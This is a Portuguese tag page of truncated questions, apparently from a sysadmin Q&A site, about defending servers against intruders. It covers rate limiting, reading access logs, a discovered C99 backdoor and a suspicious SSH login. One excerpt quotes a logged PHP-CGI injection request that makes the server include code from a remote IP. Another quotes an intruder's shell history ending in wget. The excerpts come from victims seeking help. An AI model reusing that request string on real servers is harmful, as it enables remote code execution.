Perguntas sobre defesa ou recuperação de hackers mal-intencionados. Não oferecemos suporte a hackers, portanto, perguntas sobre a realização desses hacks não são permitidas aqui.
Atualmente estou usando o Blockhosts & mod_evasive para "gerenciar" ataques menores & pedidos espúrios, eu estou querendo saber se há algo melhor / mais eficaz lá fora. Algo que se comporta como mod_evasive, monitorando solicitações conf...
Eu tenho um site wordpress hospedado no CentOS 6. Depois de ver o seguinte log de acesso, eu verifiquei o servidor, parece ok. Alguém pode explicar o que esse cara está tentando fazer? Eles conseguiram o que querem?
Eu desativei allow_url_inc...
Como posso enganar o SBS 2011 permitindo que eu atribua um alias UPN para que os usuários possam fazer logon como [email protected]
Consulte o link
Mas no SBS eu só tenho uma guia 'Geral', 'Relações Confidenciais' e 'Gerenciado por' .....
Esta é uma reescrita do meu post anterior, pois não estava totalmente claro o que eu estava tentando alcançar. Espero que isso faça mais sentido:)
Em resumo, o que estou procurando são métodos alternativos para detectar se meu sistema está com...
Desculpe se esta é uma pergunta newbie total, mas estou fazendo um trabalho de design de frontend para uma organização política radical e TODAS as minhas instalações do Linux, sejam elas openSUSE, Ubuntu ou Fedora. mais chato de maneiras.
Eu...
Estou pensando em colocar um site on-line que poderia ser um alvo atraente para hackers ou funcionários do host, que poderiam alterar o código do site em seu benefício.
Não desejando auto-hospedagem, eu estava pensando em SSH'ing no host, faz...
Estou recebendo várias tentativas de exploração de IPs diferentes hoje.
GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt...
Eu olhei para o netstat e notei que alguém além de mim está conectado ao servidor pelo ssh. Eu cuidei disso porque meu usuário tem o único acesso ssh.
Eu encontrei isso em um arquivo .bash_history do usuário ftp:
w
uname -a
ls -a
sudo su
wget...
Eu encontrei um arquivo não autorizado no meu servidor, depois de baixá-lo para o meu computador, meu antivírus reconheceu como um vírus Backdoor:PHP/C99shell.I
Alguém pode me guiar como rastrear o hack e proteger meu servidor?
Obrigado...